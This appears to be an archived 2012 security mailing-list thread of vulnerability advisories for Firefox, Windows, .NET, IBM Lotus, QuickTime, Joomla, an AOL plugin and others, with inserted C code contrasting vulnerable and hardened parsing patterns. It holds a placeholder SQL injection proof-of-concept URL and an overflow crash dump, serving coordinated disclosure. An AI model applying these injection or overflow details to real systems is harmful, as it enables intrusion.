ZDI-12-128 : Mozilla Firefox nsHTMLSelectElement Remote Code Execution Vulnerability

2012-08-06 Thread ZDI Disclosures

ZDI-12-128 : Mozilla Firefox nsHTMLSelectElement Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-128
August 3, 2012

-- CVE ID:
CVE-2011-3671

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
Mozilla

-- Affected Products:
Mozilla Firefox

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12460.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is required
to exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.

The specific flaw exists within nsINode::ReplaceOrInsertBefore() in
content/base/src/nsGenericElement.cpp. A use-after-free condition can be
triggered by adding an already parented option element to an option
collection and then removing its associated select element during event
handler execution. Successful exploitation of this vulnerability will lead
to code execution in the context of the browser.

-- Vendor Response:
Mozilla has issued an update to correct this vulnerability. More details
can be found at:

https://bugzilla.mozilla.org/show_bug.cgi?id=335998


-- Disclosure Timeline:
2011-12-07 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory


-- Credit:
This vulnerability was discovered by:
* regenrecht


-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



ZDI-12-129 : Microsoft Windows TrueType Font Parsing Remote Code Execution Vulnerability (Remote Kernel)

2012-08-06 Thread ZDI Disclosures

ZDI-12-129 : Microsoft Windows TrueType Font Parsing Remote Code Execution
Vulnerability (Remote Kernel)
http://www.zerodayinitiative.com/advisories/ZDI-12-129
August 3, 2012

-- CVE ID:
CVE-2012-0159

-- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Windows XP SP3
Microsoft Windows Vista
Microsoft Windows 7


-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code in
the context of kernel space on vulnerable installations of Microsoft
Windows. User interaction is required to exploit this vulnerability in that
the target must visit a malicious page or open a malicious file.

The specific flaw exists within the kernel's support for TrueType font
parsing of compound glyphs. A sign extension error exists in win32k.sys
when processing compound glyphs having a total number of contours above
0x7FFF. This can be exploited to corrupt kernel heap memory placed below
the space allocated for the flags buffer and potentially execute
arbitrary code in kernel space.
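
As an added illustration of the bug class this advisory describes (hypothetical code written for this page, not Microsoft's win32k.sys): a signed 16-bit contour total that wraps past 0x7FFF and is then sign-extended into a negative flags-buffer offset, beside the bounded unsigned accumulation that rejects such a glyph. The `struct component` list, the `FLAG_BYTES` layout and the sample glyphs are constructed assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical illustration (not win32k.sys code) of the bug class in
 * ZDI-12-129: the contour counts of a compound glyph's components are
 * summed into a signed 16-bit total. Past 0x7FFF that total goes negative,
 * and sign extension to a wider int turns it into a negative offset into
 * the flags buffer, i.e. a write below the allocation. */

#define MAX_CONTOURS 0x7FFFu   /* largest count a 16-bit contour field holds */
#define FLAG_BYTES   2u        /* constructed: bytes of flags per contour */

/* Constructed component list: the contour count of each component glyph. */
struct component { uint16_t contours; };

/* Vulnerable pattern: signed 16-bit accumulator that is later sign-extended.
 * Returns the byte offset at which the next component's flags would be
 * written; a negative result means a write below the flags buffer. */
int flags_offset_vulnerable(const struct component *c, size_t n)
{
    int16_t total = 0;
    for (size_t i = 0; i < n; i++)
        total = (int16_t)(total + c[i].contours);  /* wraps once the sum > 0x7FFF */
    int ext = total;                                /* sign extension: 0x8000 -> -32768 */
    return ext * (int)FLAG_BYTES;
}

/* Hardened pattern: accumulate in a wide unsigned type and reject any
 * total the format cannot represent before it becomes a size or index.
 * Returns false when the glyph must be rejected. */
bool flags_offset_hardened(const struct component *c, size_t n, size_t *out)
{
    uint32_t total = 0;
    for (size_t i = 0; i < n; i++) {
        total += c[i].contours;       /* bounded each step, so it cannot wrap */
        if (total > MAX_CONTOURS)
            return false;             /* reject instead of wrapping */
    }
    *out = (size_t)total * FLAG_BYTES;
    return true;
}

/* Constructed glyph: two components of 0x4000 contours each, 0x8000 total. */
static const struct component demo_glyph[] = { { 0x4000 }, { 0x4000 } };

/* The vulnerable computation yields -65536: the flags would be written
 * 64 KiB below the buffer. */
int demo_vulnerable_offset(void)
{
    return flags_offset_vulnerable(demo_glyph, 2);
}

/* The hardened computation rejects the same glyph. */
bool demo_hardened_accepts(void)
{
    size_t off;
    return flags_offset_hardened(demo_glyph, 2, &off);
}

/* A legitimate glyph (0x10 + 0x20 contours) gives offset 0x30 * 2 = 96. */
size_t demo_hardened_small(void)
{
    const struct component small[] = { { 0x10 }, { 0x20 } };
    size_t off = 0;
    return flags_offset_hardened(small, 2, &off) ? off : 0;
}

int main(void)
{
    printf("vulnerable offset: %d\n", demo_vulnerable_offset());
    printf("hardened: %s\n", demo_hardened_accepts() ? "accepted" : "rejected");
    return 0;
}
```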

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:

http://technet.microsoft.com/en-us/security/bulletin/ms12-039

-- Disclosure Timeline:
2011-11-04 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Alin Rad Pop (binaryproof)




ZDI-12-131 : Microsoft .NET Framework Undersized Glyph Buffer Remote Code Execution Vulnerability

2012-08-06 Thread ZDI Disclosures

ZDI-12-131 : Microsoft .NET Framework Undersized Glyph Buffer Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-131
August 3, 2012

-- CVE ID:
CVE-2012-0162

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft .NET

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the .NET Framework. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within Microsoft .NET handling of XAML Browser
Applications (XBAP) graphics components. It is possible to cause an
undersized allocation for a buffer which is populated with user-supplied
glyph data, resulting in memory corruption which can be leveraged to
remotely execute code.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:

http://technet.microsoft.com/en-us/security/bulletin/ms12-034


-- Disclosure Timeline:
2011-12-07 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Vitaliy Toropov




ZDI-12-132 : IBM Lotus iNotes dwa85W ActiveX Attachment_Times Remote Code Execution Vulnerability

2012-08-06 Thread ZDI Disclosures

ZDI-12-132 : IBM Lotus iNotes dwa85W ActiveX Attachment_Times Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-132
August 3, 2012

-- CVE ID:
CVE-2012-2175

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
IBM

-- Affected Products:
IBM Lotus iNotes

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of IBM Lotus iNotes. User interaction is required
to exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.

The specific flaw exists within the dwa85W.cab ActiveX control. When
passing a long string argument to the Attachment_Times parameter during
control instantiation, it is possible to overflow a stack buffer, causing
memory corruption. This can be leveraged by an attacker to execute code
in the context of the user running the browser.

-- Vendor Response:
IBM has issued an update to correct this vulnerability. More details can be
found at:

http://www-304.ibm.com/support/docview.wss?uid=swg21596862


-- Disclosure Timeline:
2011-12-07 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Gaurav Baruah of eSecForte Technologies Pvt. Ltd



ZDI-12-133 : GE Proficy Historian ihDataArchiver.exe Multiple Opcode Parsing Remote Code Execution Vulnerabilities

2012-08-06 Thread ZDI Disclosures

ZDI-12-133 : GE Proficy Historian ihDataArchiver.exe Multiple Opcode
Parsing Remote Code Execution Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-12-133
August 3, 2012

-- CVE ID:
CVE-2012-0229

-- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C

-- Affected Vendors:
GE

-- Affected Products:
GE Proficy Historian ihDataArchiver

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of GE iFix. Authentication is not required to
exploit this vulnerability.

The specific flaw exists within the ihDataArchiver.exe process which
listens by default on TCP port 14000. Several errors are present in the
code responsible for parsing data from the network. By providing malformed
data for opcodes 6, 7, 8, 10, and 12 the process can be made to corrupt
memory which can lead to arbitrary code execution in the context of the
user running the service.

-- Vendor Response:
GE has issued an update to correct this vulnerability. More details can be
found at:

http://support.ge-ip.com/support/index?page=kbchannelid=S:KB14767


-- Disclosure Timeline:
2011-10-17 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Luigi Auriemma



ZDI-12-134 : IBM Lotus Quickr QP2 ActiveX _Times Remote Code Execution Vulnerability

2012-08-06 Thread ZDI Disclosures

ZDI-12-134 : IBM Lotus Quickr QP2 ActiveX _Times Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-134
August 3, 2012

-- CVE ID:
CVE-2012-2176

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
IBM

-- Affected Products:
IBM Lotus Quickr

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of IBM Lotus Quickr. User interaction is required
to exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.

The specific flaw exists within the QP2.cab ActiveX control. When passing a
long string argument to the Attachment_Times or Import_Times parameters
during the control's instantiation, it is possible to overflow a stack
buffer, causing memory corruption. This can be leveraged by an attacker to
execute code in the context of the user running the browser.

-- Vendor Response:
IBM has issued an update to correct this vulnerability. More details can be
found at:

http://www-01.ibm.com/support/docview.wss?uid=swg21596191


-- Disclosure Timeline:
2011-11-29 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Gaurav Baruah of eSecForte Technologies Pvt. Ltd



ZDI-12-135 : Apple QuickTime JPEG2k Sample Size Atom Remote Code Execution Vulnerability

2012-08-06 Thread ZDI Disclosures

ZDI-12-135 : Apple QuickTime JPEG2k Sample Size Atom Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-135
August 3, 2012

-- CVE ID:
CVE-2012-0661

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
Apple

-- Affected Products:
Apple QuickTime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is required
to exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.

The specific flaw exists within the way Apple QuickTime handles movies with
the jpeg2k codec. When the size for a sample defined in the stsz atom is
too big, the QuickTime player fails to allocate the required memory for that
sample. A pointer to the previous sample data still exists after the
previous sample has been freed. This pointer is normally updated to point to
the current sample data, but that does not happen when the allocation
fails. The QuickTime player then reuses the stale pointer and a
use-after-free situation occurs. This can lead to remote code execution
in the context of the current process.
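
As an added illustration of the failure mode described above (hypothetical code written for this page, not Apple's QuickTime): a parser for the stsz sample-size atom that rejects a sample size larger than the media data actually present, and a sample-loading loop that clears the buffer pointer before each new allocation so that a failed allocation ends decoding instead of leaving a stale pointer to be reused. The atom bytes, the `alloc_limit` stand-in for allocation failure and the demo sizes are constructed.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration for ZDI-12-135 (hypothetical code, not Apple's): parse
 * a QuickTime 'stsz' sample-size atom, reject a sample size larger than the
 * media data actually present, and load samples without ever holding a
 * stale pointer when an allocation fails. The atom bytes are constructed. */

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Parse an stsz atom (size, 'stsz', version/flags, sample_size,
 * sample_count, optional per-sample table). Returns the sample count, or -1
 * if the atom is truncated or any sample size exceeds media_len. */
long parse_stsz(const uint8_t *atom, size_t len, size_t media_len,
                uint32_t *out, size_t out_cap)
{
    if (len < 20 || memcmp(atom + 4, "stsz", 4) != 0)
        return -1;
    uint32_t box_size = be32(atom);
    if (box_size < 20 || box_size > len)
        return -1;                               /* atom does not fit its buffer */
    uint32_t sample_size  = be32(atom + 12);     /* nonzero: every sample this size */
    uint32_t sample_count = be32(atom + 16);
    if (sample_count > out_cap)
        return -1;
    if (sample_size != 0) {
        if (sample_size > media_len)
            return -1;
        for (uint32_t i = 0; i < sample_count; i++)
            out[i] = sample_size;
        return (long)sample_count;
    }
    /* Variable sizes: 4 bytes per table entry must fit inside the atom. */
    if ((uint64_t)sample_count * 4 > box_size - 20)
        return -1;
    for (uint32_t i = 0; i < sample_count; i++) {
        uint32_t s = be32(atom + 20 + 4 * i);
        if (s > media_len)
            return -1;                           /* the oversized sample the advisory describes */
        out[i] = s;
    }
    return (long)sample_count;
}

/* Hardened sample loop. The flawed pattern keeps the previous sample's
 * pointer across a failed allocation and reuses it; here the pointer is
 * cleared as soon as the old buffer is freed, and a failed allocation ends
 * decoding. alloc_limit simulates allocation failure for demonstration.
 * Returns the number of samples loaded, or -1 on failure. */
long load_samples(const uint32_t *sizes, long count, size_t alloc_limit)
{
    uint8_t *cur = NULL;
    long loaded = 0;
    for (long i = 0; i < count; i++) {
        free(cur);
        cur = NULL;                              /* never keep the freed pointer */
        if (sizes[i] > alloc_limit)
            return -1;                           /* simulated allocation failure */
        cur = malloc(sizes[i] ? sizes[i] : 1);
        if (cur == NULL)
            return -1;                           /* fail closed, no stale data reuse */
        memset(cur, 0, sizes[i]);                /* stands in for reading sample data */
        loaded++;
    }
    free(cur);
    return loaded;
}

/* Constructed stsz atom: three variable-size samples of 16, 32 and
 * 0x7FFFFFF0 bytes; the last one is deliberately oversized. */
static const uint8_t demo_stsz[] = {
    0x00, 0x00, 0x00, 0x20,  's', 't', 's', 'z',
    0x00, 0x00, 0x00, 0x00,                      /* version + flags */
    0x00, 0x00, 0x00, 0x00,                      /* sample_size = 0: table follows */
    0x00, 0x00, 0x00, 0x03,                      /* sample_count = 3 */
    0x00, 0x00, 0x00, 0x10,
    0x00, 0x00, 0x00, 0x20,
    0x7F, 0xFF, 0xFF, 0xF0,
};

/* Against 1 KiB of media data the parser rejects the atom (returns -1). */
long demo_parse_rejects_oversized(void)
{
    uint32_t out[8];
    return parse_stsz(demo_stsz, sizeof demo_stsz, 1024, out, 8);
}

/* With media data large enough for every entry, all 3 samples are accepted. */
long demo_parse_accepts(void)
{
    uint32_t out[8];
    return parse_stsz(demo_stsz, sizeof demo_stsz, (size_t)0xFFFFFFFFu, out, 8);
}

/* Loading samples of 16 and 32 bytes: 2 under a 64-byte limit, -1 under a
 * 16-byte limit (the second allocation fails and decoding stops). */
long demo_load(size_t alloc_limit)
{
    uint32_t sizes[2] = { 16, 32 };
    return load_samples(sizes, 2, alloc_limit);
}
```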

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can
be found at:

http://support.apple.com/kb/HT1222


-- Disclosure Timeline:
2011-11-29 - Vulnerability reported to vendor
2012-08-03 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put



[ MDVSA-2012:123 ] libreoffice

2012-08-06 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:123
 http://www.mandriva.com/security/
 ___

 Package : libreoffice
 Date: August 4, 2012
 Affected: 2011.
 ___

 Problem Description:

 A security issue was identified and fixed in libreoffice:
 
 Multiple heap-based buffer overflow flaws were found in the XML
 manifest encryption tag parsing code of LibreOffice. An attacker
 could create a specially-crafted file in the Open Document Format
 for Office Applications (ODF) format which when opened could cause
 arbitrary code execution (CVE-2012-2665).
 
 libreoffice for Mandriva Linux 2011 has been upgraded to the 3.5.5
 version which is not vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2665
 ___

 Updated Packages:

 Mandriva Linux 2011:

[SECURITY] [DSA 2521-1] libxml2 security update

2012-08-06 Thread Moritz Muehlenhoff

-------------------------------------------------------------------------
Debian Security Advisory DSA-2521-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
August 04, 2012                      http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: libxml2
Vulnerability  : integer overflows
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-2807

Jueri Aedla discovered several integer overflows in libxml, which could
lead to the execution of arbitrary code or denial of service.

For the stable distribution (squeeze), this problem has been fixed in
version 2.7.8.dfsg-2+squeeze5.

For the testing distribution (wheezy) and the unstable distribution (sid),
this problem has been fixed in version 2.8.0+dfsg1-5.

We recommend that you upgrade your libxml2 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[ MDVSA-2012:124 ] openoffice.org

2012-08-06 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:124
 http://www.mandriva.com/security/
 ___

 Package : openoffice.org
 Date: August 4, 2012
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 A security issue was identified and fixed in openoffice.org:
 
 Multiple heap-based buffer overflow flaws were found in the XML
 manifest encryption tag parsing code of openoffice.org. An attacker
 could create a specially-crafted file in the Open Document Format
 for Office Applications (ODF) format which when opened could cause
 arbitrary code execution (CVE-2012-2665).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2665
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:

[security bulletin] HPSBMU02798 SSRT100908 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)

2012-08-06 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03405705

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03405705
Version: 1

HPSBMU02798 SSRT100908 rev.1 - HP Network Node Manager i (NNMi) for HP-UX,
Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-02
Last Updated: 2012-08-02

Potential Security Impact: Remote cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network Node
Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerabilities
could be remotely exploited resulting in cross site scripting (XSS).

References: CVE-2012-2022

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Node Manager I (NNMi) v8.x, v9.0x, v9.1x, v9.20 for HP-UX, Linux,
Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference          Base Vector                  Base Score
CVE-2012-2022        (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
===========================================================
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made hotfixes available to resolve these vulnerabilities for NNMi
v9.0x, v9.1x, and v9.20. The hotfixes can be obtained by contacting the
normal HP Services support channel. Customers should open a support case to
request the following hotfixes. Customers using NNMi v8.x should upgrade to
v9.0x, v9.1x, or 9.20 and apply the required patch and the hotfix.

For NNMi v9.0x and v9.1x

NNMi Version   Required Patch       Hotfix
9.0x           Patch 5              Hotfix-NNMi-9.0xP5-UI-Security-20120801
9.1x           Patch 3 or 4         Hotfix-NNMi-9.1xP4-UI-Security-20120801
9.20           no patch required    Hotfix-NNMi-9.20-NmsAsShared-20120801

Note: The hotfix must be installed after the required patch. The hotfix must
be reinstalled if the required patch is reinstalled.

For NNMi v8.x

Upgrade to v9.0x, v9.1x, or v9.20 and apply the required patch and the hotfix
listed in the table above.

MANUAL ACTIONS: Yes - Update

Install the applicable patch and hotfix.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

For HP-UX NNMi v9.0x

HP-UX B.11.31
HP-UX B.11.23 (IA)
=
HPOvNNM.HPOVNNMUI
action: install Hotfix-NNMi-9.0xP5-UI-Security-20120801

For HP-UX NNMi v9.1x

HP-UX B.11.31
HP-UX B.11.23 (IA)
=
HPOvNNM.HPOVNNMUI
action: install Hotfix-NNMi-9.1xP4-UI-Security-20120801

For HP-UX NNMi v9.20

HP-UX B.11.31
HP-UX B.11.23 (IA)
=
HPOvNNM.HPOVNMSASSHARED
action: install Hotfix-NNMi-9.20-NmsAsShared-20120801

For HP-UX NNMi v8.x

HP-UX B.11.31
HP-UX B.11.23 (IA)
=
HPOvNNM.HPOVNNMUI
action: upgrade to v9.0x or v9.1x and apply the required patch and hotfix

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 2 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = 

Joomla com_package - SQL Injection Vulnerability

2012-08-06 Thread Vulnerability Lab
Title:
==
Joomla com_package - SQL Injection Vulnerability


Date:
=
2012-07-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=652


VL-ID:
=
652


Common Vulnerability Scoring System:

8.3


Introduction:
=
Joomla is a free and open source content management system (CMS) for publishing
content on the World Wide Web and intranets and a model–view–controller (MVC)
Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and
software design patterns, stores data in a MySQL database, and includes features
such as page caching, RSS feeds, printable versions of pages, news flashes,
blogs, polls, search, and support for language internationalization.
Joomla had been downloaded 23 million times. Between March 2007 and February
2011 there had been more than 21 million downloads. As of November 2011, there
are over 8,600 free and commercial extensions available from the official
Joomla! Extension Directory and more available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)


Abstract:
=
A Vulnerability-Lab researcher discovered a SQL injection vulnerability in the
com_package module of the Joomla CMS.


Report-Timeline:

2012-07-08: Public or Non-Public Disclosure



Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL injection vulnerability is detected in the com_package module of the
Joomla Content Management System. Remote attackers & low privileged user
accounts can execute/inject their own SQL commands to compromise the application
DBMS. The vulnerability is located in the com_package module with the bound
vulnerable id parameter. Successful exploitation of the vulnerability results in
DBMS (server) or application (web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_package

Vulnerable Parameter(s):
[+] id


Proof of Concept:
=
The SQL injection vulnerabilities can be exploited by remote attackers without a
privileged user account or required user interaction. For demonstration or
reproduce ...

PoC:

Path:   /
File:   index.php
Module: ?option=com_package
Parameter:  details&id=-1'[SQL Injection]--
URL:
http://www.xxx.com/index.php?option=com_package&task=details&id=174-1'[SQL Injection]--


Risk:
=
The security risk of the remote SQL injection vulnerability is estimated as
critical.


Credits:

Vulnerability Research Laboratory -  Chokri Ben Achor 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some states do not allow
the exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply. We do not approve or
encourage anybody to break any vendor licenses, policies, deface websites, hack
into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:  twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, sourcecode, videos and other information on this website is
trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a
permission.

  

[SECURITY] [DSA 2522-1] fckeditor security update

2012-08-06 Thread Yves-Alexis Perez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512


- -
Debian Security Advisory DSA-2522-1                   secur...@debian.org
http://www.debian.org/security/                       Yves-Alexis Perez
August 05, 2012                        http://www.debian.org/security/faq
- -

Package: fckeditor
Vulnerability  : cross site scripting
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4000
Debian Bug : 683418

Emilio Pinna discovered a cross site scripting vulnerability in the
spellchecker.php page of FCKeditor, a popular html/text editor for the web.

For the stable distribution (squeeze), this problem has been fixed in
version 1:2.6.6-1squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 1:2.6.6-3.

For the unstable distribution (sid), this problem has been fixed in
version 1:2.6.6-3.

We recommend that you upgrade your fckeditor packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2519-2] isc-dhcp regression

2012-08-06 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2519-2                   secur...@debian.org
http://www.debian.org/security/                              Nico Golde
August 4, 2012                         http://www.debian.org/security/faq
- -

Package: isc-dhcp
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-4539 CVE-2012-3571 CVE-2012-3954

It was discovered that the recent update for isc-dhcp did not contain
the patched code included in the source package.  Due to a quirk in the
build system those patches were deapplied during the build process.

For the stable distribution (squeeze), this problem has been fixed in
version 4.1.1-P1-15+squeeze6.

We recommend that you upgrade your isc-dhcp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution

2012-08-06 Thread nospam
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution

tested against: Microsoft Windows Vista sp2
Microsoft Windows Server 2003 r2 sp2
Mozilla Firefox 14.0.1
   
download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe
(this was the update for a previous vulnerability, see ZDI-12-098)

see also the installer aol_toolbar_pricecheck.exe
url: http://toolbar.aol.com/download_files/download-helper.html?brand=aol&a=111&ncid=txtlnkusdown0043

vulnerability:
the mentioned product installs a Firefox plugin:

File: npdnupdater2.dll
Version: 1.3.0.0
Name: npdnupdater2
Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll
Mime type: applicatiotn/x-vend.aol.dnupdater2.1
Extension: ocp

By embedding this plugin inside an HTML page it is possible to trigger a
buffer overflow vulnerability through the 'SRC' parameter.

Example crash:

EAX 
ECX 01101470
EDX 01135208 ASCII 

EBX 
ESP 0013F618
EBP 0013F634
ESI 0002
EDI 0013F668
EIP 61616161

C 1  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
